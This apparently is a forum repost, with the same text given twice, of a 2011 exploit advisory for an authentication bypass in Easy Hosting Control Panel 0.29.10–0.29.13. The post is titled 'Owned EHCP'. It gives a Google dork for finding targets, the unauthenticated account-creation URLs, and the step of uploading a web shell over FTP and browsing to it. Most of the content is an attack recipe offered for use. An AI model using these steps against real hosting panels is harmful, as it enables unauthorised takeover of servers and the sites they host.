توییت
[align=CENTER]Owned EHCP (using Auth Bypass)
[align=LEFT]Exploit Title: Easy Hosting Control Panel Admin Auth Bypass
# Google Dork: inurl:/ehcp/?op=applyfordomainaccount "logout"
# Date: 10/04/2011
# Author: Jasman
# Software Link: https://launchpad.net/ehcp & http://www.ehcp.net
# Version: 0.29.10 - 0.29.13
# Tested on: Ubuntu, Debian
# Category: webapps
# Other Link: https://bugs.launchpad.net/ehcp/+bug/865889
+ Description
Easy Hosting Control Panel designed for hosting of multiple domains on single machine.
It uses LAMP(LinuxApacheMysqlPhp). Its aim:easily installable,easy usage, non-complex,functional
+ Vulnerable:
to add a ftp account & domain does not require a login.
http://www.site.com/vhosts/ehcp/?op=applyforaccount
http://www.site.com/vhosts/ehcp/?op=applyforftpaccount
http://www.site.com/vhosts/ehcp/index.php?op=applyfordomainaccount
+ Exploit
upload a shell via ftp
http://site.com/vhosts/[username]/[domain]/httpdocs/shell.php
+ Tested On
0.29.13
0.29.11
0.29.10
[/align] [/align]
[align=LEFT]Exploit Title: Easy Hosting Control Panel Admin Auth Bypass
# Google Dork: inurl:/ehcp/?op=applyfordomainaccount "logout"
# Date: 10/04/2011
# Author: Jasman
# Software Link: https://launchpad.net/ehcp & http://www.ehcp.net
# Version: 0.29.10 - 0.29.13
# Tested on: Ubuntu, Debian
# Category: webapps
# Other Link: https://bugs.launchpad.net/ehcp/+bug/865889
+ Description
Easy Hosting Control Panel designed for hosting of multiple domains on single machine.
It uses LAMP(LinuxApacheMysqlPhp). Its aim:easily installable,easy usage, non-complex,functional
+ Vulnerable:
to add a ftp account & domain does not require a login.
http://www.site.com/vhosts/ehcp/?op=applyforaccount
http://www.site.com/vhosts/ehcp/?op=applyforftpaccount
http://www.site.com/vhosts/ehcp/index.php?op=applyfordomainaccount
+ Exploit
upload a shell via ftp
http://site.com/vhosts/[username]/[domain]/httpdocs/shell.php
+ Tested On
0.29.13
0.29.11
0.29.10
[/align] [/align]
[/align]